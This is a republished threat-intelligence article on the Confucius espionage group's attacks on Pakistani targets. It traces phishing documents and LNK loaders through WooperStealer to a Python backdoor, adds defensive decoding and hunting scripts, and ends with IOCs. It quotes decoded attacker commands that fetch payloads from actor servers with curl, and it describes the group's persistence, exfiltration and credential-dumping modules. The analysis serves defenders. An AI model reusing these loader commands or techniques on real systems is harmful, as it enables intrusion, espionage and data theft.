The Confucius Group

The Confucius group is a long-running cyber-espionage actor operating primarily across South Asia.  First identified in 2013, the group is believed to have links to state-sponsored operations in the region.  Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries, especially in Pakistan, using spear-phishing and malicious documents as initial access vectors.  Recent campaigns have highlighted a sharp evolution in tactics, shifting from document stealers like WooperStealer to Python-based backdoors such as AnonDoor.  This progression underscores Confucius’ adaptability and the growing sophistication of state-aligned malware campaigns in the region.

Over the past several months, our friends at FortiGuard Labs have observed Confucius evolving its tradecraft, leveraging weaponized Office documents, malicious LNK files, and multiple malware families, including custom Python RATs and advanced stealers.  The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities.  Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness.  In this article, Fortinet will provide a chronological walkthrough of Confucius’ recent activity.


Figure 1: Confucius’ activities

December 2024 – Document.ppsx Infection Chain

This phishing email campaign targeted users in Pakistan.  The message relied on authority spoofing, minimal context, and an action-oriented request to entice the recipient into opening the attachment and kick off the infection chain.

Figure 2: Phishing email

Once Document.ppsx was opened, it displayed a “Corrupted Page” message.  An embedded OLE object in slide1.xml.rels then triggered a script in the background from the remote URL greenxeonsr.info.

Figure 3: Malicious URL

The mango44NX.doc file is a VBScript that forms a compact dropper with persistence and execution staging capabilities.  The first part downloads a remote payload from hxxps://greenxeonsr[.]info/Jsdfwejhrg.rko via MSXML2.XMLHTTP, writes the raw response bytes into %LocalAppData%\Mapistub.dll using an ADODB.Stream, and then closes the stream.

Figure 4: Download DLL

It then copies C:\Windows\System32\fixmapi.exe to the directory %AppData% as Swom.exe and writes a registry string value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\load that points to it for persistence.

It finally uses a reconstructed Shell.Application COM object to launch Swom.exe, which side-loads and executes the malicious DLL Mapistub.dll.

Figure 5: Registry setting

The malicious DLL Mapistub.dll prepared two remote addresses (cornfieldblue[.]info and hauntedfishtree[.]info) for the next stage of stealer activity.

Figure 6: MSIL downloader

After downloading the data, it loaded the file with a hard-coded method Yretisdkjhsfkjfh.

Figure 7: Hard-coded method

Analysis revealed that the final-stage payload was WooperStealer, identifiable by the stringToEscape variable Class1.Wooper.  This stealer was configured to collect a wide range of file types with specific extensions: .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .doc, .DOC, .xls, .XLS, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG, .eml, .EML, .pst, .PST, .ZIP, .zip, .RAR, .rar.  It enumerates the compromised system’s drives with Directory.GetLogicalDrives and uploads the stolen data to the remote URL hxxp://marshmellowflowerscar[.]info.

Figure 8: WooperStealer

2025 March – Invoice_Jan25.pdf.lnk Infection Chain

By early 2025, the Confucius group had shifted to using malicious LNK files in its campaigns.  During their investigation, the researchers obtained a sample associated with the machine ID desktop-1tjntib.  It prepared a legitimate executable, BlueAle.exe, copied from C:\Windows\System32\fixmapi.exe, and downloaded a malicious DLL and a decoy PDF from the remote server petricgreen.info.

The decoded $x command is:

curl -o ($pa + '\mapistub.dll') “hxxps://petricgreen[.]info/RPXFD38WAPR7.rko”;$j=$env:TMP + '\file.pdf'; curl -o $j “hxxps://petricgreen[.]info/BWN9ZAP.rko”;

Figure 9: LNK file

The malicious DLL, mapistub.dll, copied targeted files into C:\Windows\Tasks and established persistence by adding registry entries.

Figure 10: Registry setting

The DLL embedded two Base64-encoded strings, representing remote hosts for the final payload.  Once the additional data was downloaded, the DLL invoked it using the same hard-coded method observed in earlier activity.

Figure 11: MSIL downloader

The final payload was again identified as WooperStealer, this time with minor modifications to its target list of file extensions: .zip, .rar, .eml, .txt, .TXT, .pdf, .PDF, .png, .PNG, .jpg, .JPG, .DOC, .doc, .XLS, .xls, .xlm, .XLM, .odp, .ODP, .ods, .ODS, .odt, .ODT, .rtf, .RTF, .ppt, .PPT, .xlsx, .XLSX, .xlsm, .XLSM, .docx, .DOCX, .pptx, .PPTX, .docm, .DOCM, .jpeg, .JPEG.

Figure 12: Targeted directory list

Figure 13 shows the familiar stringToEscape variable Class1.Wooper, solidifying attribution to WooperStealer.

Figure 13: WooperStealer

WooperStealer uses POST requests to upload stolen files with three parameters: value1 carries the victim’s system identifiers (<SerialNumber>_<ComputerName>_<UserName>), value2 the file path, and value3 the file hash.  The hash-based check ensures that a file is not uploaded more than once.

Figure 14: Uploaded stolen file

Figure 15: Transmitting the hash of the stolen file

Based on the telemetry gathered by researchers, this attack targets users in Pakistan.


Figure 16: Telemetry

2025 August – New Python Backdoor

In August, analysts observed another malicious LNK file, NLC.pdf.lnk, that leveraged a similar execution technique but introduced new payloads.  The decoded command in the $x variable revealed the following activity:

curl -o ($pa + '\python313.dll') “bloomwpp.info/KM9XFY.kut”;curl -o $c “bloomwpp.info/WTBXX46.kut”;$j=$env:TMP + '\file.pdf'; curl -o $j “bloomwpp.info/JRC89.kut”;

The LNK file carries a long numeric array that is piped through %{[char]($_-217)} to reconstruct a script, which it then executes with IEX.  The script fetches data from bloomwpp.info and writes it to %LocalAppData% under the filenames python313.dll and BlueAle.exe, along with a temporary PDF named file.pdf.  The PDF is opened immediately to distract the user while BlueAle.exe side-loads the malicious python313.dll.

Figure 17: LNK file
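The numeric-array trick above is easy to undo once the mapping block is located: every element is an ASCII code shifted by a constant, so the analysis step is to pull the array and the constant out of the LNK command and reverse the subtraction. The decoder below is an added example written for this article, not code from the FortiGuard report or from the malware. The array in SAMPLE_COMMAND is a constructed fixture that decodes to a hypothetical curl line in the style of the $x commands shown on the page; the candidate_offsets helper goes one step beyond the page by brute-forcing the shift when the [char]($_-N) block is not visible.

```python
import re
from typing import List, Optional

# Constructed sample in the shape the page describes: a numeric array piped
# through %{[char]($_-217)} and handed to IEX. The decoded command is a
# hypothetical download line built for this example, not one recovered from
# the NLC.pdf.lnk sample.
SAMPLE_COMMAND = (
    "-join ((316,334,331,325,249,262,328,249,253,323,249,315,325,328,328,326,"
    "336,329,329,263,322,327,319,328,264,291,299,284,273,274,263,324,334,333)"
    "|%{[char]($_-217)})|IEX"
)

ARRAY_RE = re.compile(r"\(\s*(\d+(?:\s*,\s*\d+)+)\s*\)")      # (n1,n2,...)
OFFSET_RE = re.compile(r"\[char\]\(\$_\s*-\s*(\d+)\s*\)")      # [char]($_-N)


def extract_array(command: str) -> List[int]:
    """Return the first comma-separated integer list found in the command."""
    m = ARRAY_RE.search(command)
    return [int(n) for n in m.group(1).split(",")] if m else []


def extract_offset(command: str) -> Optional[int]:
    """Return N from the [char]($_-N) mapping block, if present."""
    m = OFFSET_RE.search(command)
    return int(m.group(1)) if m else None


def decode_numeric_array(nums: List[int], offset: int) -> str:
    """Apply the same per-element subtraction PowerShell would, then join."""
    return "".join(chr(n - offset) for n in nums)


def candidate_offsets(nums: List[int], lo: int = 0, hi: int = 400) -> List[int]:
    """Offsets in [lo, hi) under which every element maps to printable ASCII.

    Useful when the mapping block has been split or mangled so the constant
    is not visible; this goes beyond the page, which only documents 217.
    """
    return [k for k in range(lo, hi) if all(32 <= n - k <= 126 for n in nums)]


def deobfuscate(command: str) -> Optional[str]:
    """Recover the plaintext script from a numeric-array + IEX one-liner."""
    nums = extract_array(command)
    offset = extract_offset(command)
    if not nums or offset is None:
        return None
    return decode_numeric_array(nums, offset)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_COMMAND))
```

Run it against the command string extracted from a LNK (for example the target arguments shown by a LNK parser) rather than against the binary file itself; the regexes expect the PowerShell text. If candidate_offsets returns several values, decode with each and keep the one that yields recognisable PowerShell.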

Unlike previous campaigns that deployed WooperStealer, python313.dll sets up an execution environment for a new Python-based backdoor.  It first creates a temporary PowerShell script at %TEMP%\_CL_cb7565c393993c050319426106747613in.ps1, downloaded from hxxps://bloomwpp[.]info/hjopjhfgda.ps1, which installs Scoop and configures the environment variables required to ensure Python code can execute without errors.

Figure 18: MSIL downloader

Figure 19: Preparing the Python execution path

It then constructs the remote URL hxxps://bloomwpp[.]info/hjdfyebvghu[.]pyc, downloads the raw bytes with a GetByteArrayAsync call that it waits on synchronously, and writes the received bytes to a file named winresume.pyc under the current user’s %LOCALAPPDATA% directory.  After writing the file, it marks it hidden using FileAttributes.Hidden.

Figure 20: Entry point

It constructs the target path %LOCALAPPDATA%\winresume.pyc and creates a scheduled task named NetPolicyUpdate that runs pythonw.exe from the Scoop installation set up by the earlier PowerShell script (%USERPROFILE%\scoop\apps\python\current\pythonw.exe) with the .pyc as its argument every 5 minutes.  The task provides persistence that is better concealed than the earlier registry setting, and pythonw.exe acts as a stealthy launcher because it opens no console window.

Figure 21: Persistence setting preparation

Figure 22: Scheduled task
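The two persistence mechanisms described so far (the HKCU\...\Windows\load registry value pointing at a renamed fixmapi.exe, and the NetPolicyUpdate scheduled task running pythonw.exe with a .pyc argument) together with the side-loading layout (a copied executable beside Mapistub.dll or python313.dll in a user-writable folder) can be checked from a host snapshot. The hunt below is an added example for this article, not FortiGuard's tooling or a signature from the report. The scheduled-task records, the load value and the file listing are constructed fixtures in the shape of what schtasks /query /fo CSV /v, a registry query and a profile directory listing would produce, and the USER_WRITABLE_RE pattern is an assumption about where a standard user can write.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ScheduledTask:
    name: str
    command: str      # executable in "Task To Run"
    arguments: str


@dataclass
class Finding:
    check: str
    detail: str


# Assumed set of locations a standard user can write to; a launcher or DLL
# living here is the pattern this campaign used (%AppData%, %LocalAppData%,
# the Scoop install, C:\Windows\Tasks).
USER_WRITABLE_RE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|scoop)|ProgramData|Windows\\Tasks)\\", re.I)
# DLL names the report says were side-loaded by a renamed copy of fixmapi.exe.
SIDELOAD_DLLS = {"mapistub.dll", "python313.dll"}

# Constructed host snapshot for this example (not telemetry from the report).
SAMPLE_TASKS = [
    ScheduledTask("NetPolicyUpdate",
                  r"C:\Users\alice\scoop\apps\python\current\pythonw.exe",
                  r"C:\Users\alice\AppData\Local\winresume.pyc"),
    ScheduledTask("MicrosoftEdgeUpdateTaskMachineCore",
                  r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
                  "/c"),
    ScheduledTask("NightlyReport",
                  r"C:\Program Files\Python313\pythonw.exe",
                  r"C:\Tools\report.py"),
]
SAMPLE_LOAD_VALUE = r"C:\Users\alice\AppData\Roaming\Swom.exe"
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Local\BlueAle.exe",
    r"C:\Users\alice\AppData\Local\python313.dll",
    r"C:\Users\alice\AppData\Local\file.pdf",
    r"C:\Program Files\Python313\pythonw.exe",
    r"C:\Program Files\Python313\python313.dll",
]


def check_tasks(tasks: List[ScheduledTask]) -> List[Finding]:
    """pythonw.exe launching a .pyc is the AnonDoor launcher shape; note when
    the interpreter itself sits in a user-writable location."""
    out = []
    for t in tasks:
        if ntpath.basename(t.command).lower() != "pythonw.exe":
            continue
        if ".pyc" not in t.arguments.lower():
            continue
        where = "user-writable" if USER_WRITABLE_RE.search(t.command) else "system"
        out.append(Finding("schtasks", f"{t.name}: {where} {t.command} {t.arguments}"))
    return out


def check_load_value(value: str) -> List[Finding]:
    """The Windows\\load value is almost never populated legitimately."""
    if value and value.strip():
        return [Finding("registry", "HKCU\\...\\Windows\\load = " + value)]
    return []


def check_sideload_dirs(paths: List[str]) -> List[Finding]:
    """An .exe beside mapistub.dll or python313.dll in a user-writable folder."""
    by_dir = {}
    for p in paths:
        d, f = ntpath.split(p)
        by_dir.setdefault(d, set()).add(f.lower())
    out = []
    for d, names in by_dir.items():
        dlls = sorted(names & SIDELOAD_DLLS)
        exes = sorted(n for n in names if n.endswith(".exe"))
        if dlls and exes and USER_WRITABLE_RE.search(d + "\\"):
            out.append(Finding("sideload", f"{d}: {exes} beside {dlls}"))
    return out


def hunt(tasks, load_value, paths) -> List[Finding]:
    return check_tasks(tasks) + check_load_value(load_value) + check_sideload_dirs(paths)


if __name__ == "__main__":
    for f in hunt(SAMPLE_TASKS, SAMPLE_LOAD_VALUE, SAMPLE_FILES):
        print(f"[{f.check}] {f.detail}")
```

The checks are pure functions over collected data so they run the same way on an exported snapshot as on a live host; a real collector would read the load value with winreg and the task list from schtasks, and the legitimate python313.dll under Program Files in the sample is deliberately left unflagged because the folder is not user-writable.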

The PYC file winresume.pyc serves as a backdoor that collects system information, contacts its C2 server, and receives commands for further action.

Figure 23: PYC version of AnonDoor

The following analysis is based on the disassembly code from the PYC file.
Figure 24: Disassembly code of the PYC file

By dropping a timestamp into %TEMP%\wctDD1A.tmp, AnonDoor ensures its heavier tasks run at most once every 6 minutes on a host.  That reduces noise, avoids redundant exfil, and ensures more controlled timing.

Figure 25: TEMP file to track execution time

It runs a compact fingerprinting routine that quietly profiles the host and its network before performing any noisy actions.  It derives the local egress IP and grabs the hostname and logged-in user.  It then fingerprints the OS with platform.platform().  For external context, it queries several public IP echo services in sequence (api.ipify.org, ipinfo.io/ip, icanhazip.com, and ifconfig.me/ip).   Once it has a public IP, it geo-locates the country via ip-api.com and ipwhois.app. To uniquely tag hardware, it executes a hidden wmic csproduct get uuid command.
Figure 26: Get system information

AnonDoor consolidates the collected system information into the parameter uhhg using $!!$ as a delimiter between fields.  The resulting data is transmitted to the C2 server, where access and retrieval appear to be restricted to specific geographic targets such as Pakistan.  The overall packet structure closely mirrors that of the earlier MSIL-based AnonDoor backdoor, underscoring Confucius’ recent transition toward deploying a Python-based variant of AnonDoor.


Figure 27: C2 server information

Figure 28: C2 connection

It uses the Windows API GetDiskFreeSpaceExW to quietly inventory local storage.  It walks the drive letters A:\ through Z:\, checks which paths exist, and calls GetDiskFreeSpaceExW for each live volume.  It converts bytes to GiB by integer division by 1,073,741,824 and emits compact entries such as C:476GB/ Free-120GB, then joins the entries for all volumes and sends them to the C2 server in the parameter fhgfh.

Figure 29: Get the system's volume information

AnonDoor then contacts its C2 server with the parameter cuud to request further tasks.  If the server replies with raw task data other than the string Somethingworng1, it immediately sends a POST request back with sout=<ID>@$$@<raw_task_data>.  It then splits the data on #$$ and dispatches on the task name.  It supports a series of commands, including CmdExecution, Screenshoot, fileListing, DownloadFile, Directory_listing, FolderDownload, basicinfo, and PasswordDumper.  For some tasks, AnonDoor downloads another Python file from the URL inside <raw_task_data> and executes it.

Figure 30: Constructing a packet for a C2 command

Figure 31: Handling the C2 command

Take the Screenshoot command, for example.  AnonDoor receives the module URL hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py, which is used to capture the victim’s screen.  It then packs the screenshot’s PNG data into the format <uuid>!$$$!Screenshoot!$$$!<command>###<module_url>!$$$!<ID>!$$$!<PNG_base64>, encodes the entire string with Base64, and sends it back to the C2 server in the parameter SCtat.

Figure 32: Python module for Screenshoot

Figure 33: Python module for fileListing
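The delimiters documented above (the $!!$ field joiner in uhhg, the sout=<ID>@$$@<raw_task_data> reply, the #$$ task split and the !$$$! / ### layout of a Base64-wrapped SCtat upload) are enough to decode AnonDoor traffic recovered from a proxy log or packet capture. The parser below is an added example for this article, not code from the report or from the backdoor. It only decodes; the SCtat fixture it builds for itself is constructed (the "PNG" is just the 8-byte signature plus padding), the field order inside uhhg is not documented on the page so parse_beacon returns the fields positionally, and the assumption that the <command> field repeats the task name is mine.

```python
import base64
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Delimiters as reported on the page.
BEACON_SEP = "$!!$"   # joins host-fingerprint fields in parameter uhhg
SOUT_SEP = "@$$@"     # sout=<ID>@$$@<raw_task_data>
TASK_SEP = "#$$"      # splits raw task data before dispatch
FIELD_SEP = "!$$$!"   # separates fields of a result packet (SCtat)
CMD_SEP = "###"       # separates <command> from <module_url> inside a field
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
KNOWN_TASKS = {"CmdExecution", "Screenshoot", "fileListing", "DownloadFile",
               "Directory_listing", "FolderDownload", "basicinfo", "PasswordDumper"}


@dataclass
class ScreenshotResult:
    uuid: str
    task: str
    command: str
    module_url: str
    task_id: str
    png: bytes


def parse_beacon(uhhg: str) -> List[str]:
    """Split the uhhg fingerprint into its raw fields (the page does not give
    the field order, so they are returned positionally)."""
    return uhhg.split(BEACON_SEP)


def parse_sout(sout: str) -> Tuple[str, str]:
    """sout=<ID>@$$@<raw_task_data> -> (task id, raw task data)."""
    task_id, _, raw = sout.partition(SOUT_SEP)
    return task_id, raw


def parse_task(raw: str) -> Tuple[str, List[str], bool]:
    """Split raw task data on #$$; the first element is the task name."""
    parts = raw.split(TASK_SEP)
    return parts[0], parts[1:], parts[0] in KNOWN_TASKS


def parse_screenshot_packet(sctat: str) -> Optional[ScreenshotResult]:
    """Decode a SCtat upload; returns None unless every layer checks out."""
    try:
        outer = base64.b64decode(sctat, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    fields = outer.split(FIELD_SEP)
    if len(fields) != 5 or fields[1] != "Screenshoot":
        return None
    command, _, module_url = fields[2].partition(CMD_SEP)
    try:
        png = base64.b64decode(fields[4], validate=True)
    except ValueError:
        return None
    if not png.startswith(PNG_MAGIC):
        return None
    return ScreenshotResult(fields[0], fields[1], command, module_url, fields[3], png)


# Constructed fixture for this example: the PNG is only its 8-byte signature
# plus padding, and the <command> field is assumed to repeat the task name.
SAMPLE_PNG = PNG_MAGIC + b"\x00" * 8
SAMPLE_MODULE_URL = "hxxps://bloomwpp[.]info/DubjW967VGHD3ykdnhkdhn/dsdcrjhdeenidufoft.py"


def build_sample_sctat() -> str:
    inner = FIELD_SEP.join([
        "11111111-2222-3333-4444-555555555555", "Screenshoot",
        "Screenshoot" + CMD_SEP + SAMPLE_MODULE_URL, "1001",
        base64.b64encode(SAMPLE_PNG).decode("ascii")])
    return base64.b64encode(inner.encode("utf-8")).decode("ascii")


if __name__ == "__main__":
    r = parse_screenshot_packet(build_sample_sctat())
    print(r.uuid, r.module_url, len(r.png), "bytes")
```

Feed parse_screenshot_packet the raw value of the SCtat POST parameter and write the returned png bytes to disk to see what was exfiltrated; parse_sout and parse_task applied to the cuud/sout exchange give you the task names and module URLs the operator pushed, which is usually the quickest way to scope what a compromised host was asked to do.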

For PasswordDumper, which we observed in September, the URL is hard-coded in the PYC file.  AnonDoor routes that task to download both helpers from bloomwpp[.]info and caches their source in memory.

During execution, it chooses which helper to run based on the task’s target: Fohjdfj783mq9XX.py is for Firefox, and Fodkh3897mgfdjiuED.py is for Edge.

Figure 34: Dump of Firefox data

Figure 35: Dump of Edge data

Conclusion

Our analysis reveals how the Confucius group has continually evolved its techniques, adopting diverse file types as initial access vectors and chaining OLE objects, malicious scripts, LNK files, PowerShell loaders, MSIL downloaders, and heavily obfuscated payloads to evade detection.  This campaign highlights the group’s technical agility, switching between malware families, including WooperStealer, the MSIL-based AnonDoor, and its Python-based variant.

The layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility.  As threat actors persistently refine their methods to bypass defenses, maintaining vigilance against varied attack techniques is critical. FortiGuard Labs will continue to closely monitor these evolving operations, providing users with timely and comprehensive protection.[1]

IOCs

Domain:

marshmellowflowerscar.info
greenxeonsr.info
cornfieldblue.info
hauntedfishtree.info
petricgreen.info
bloomwpp.info
dropmicis.info
martkartout.info

PPSX:

c91917ff2cc3b843cf9f65e5798cd2e668a93e09802daa50e55a842ba9e505de

LNK:

5a0dd2451a1661d12ab1e589124ff8ecd2c2ad55c8f35445ba9cf5e3215f977e
4206ab93ac9781c8367d8675292193625573c2aaacf8feeaddd5b0cc9136d2d1 

DLL:

8603b9fa8a6886861571fd8400d96a705eb6258821c6ebc679476d1b92dcd09e
24b06b5caad5b09729ccaffa5a43352afd2da2c29c3675b17cae975b7d2a1e62
13ca36012dd66a7fa2f97d8a9577a7e71d8d41345ef65bf3d24ea5ebbb7c5ce1

PYC:

06b8f395fc6b4fda8d36482a4301a529c21c60c107cbe936e558aef9f56b84f6
11391799ae242609304ef71b0efb571f11ac412488ba69d6efc54557447d022f

 

This article is shared with permission at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

 

[1] https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor/
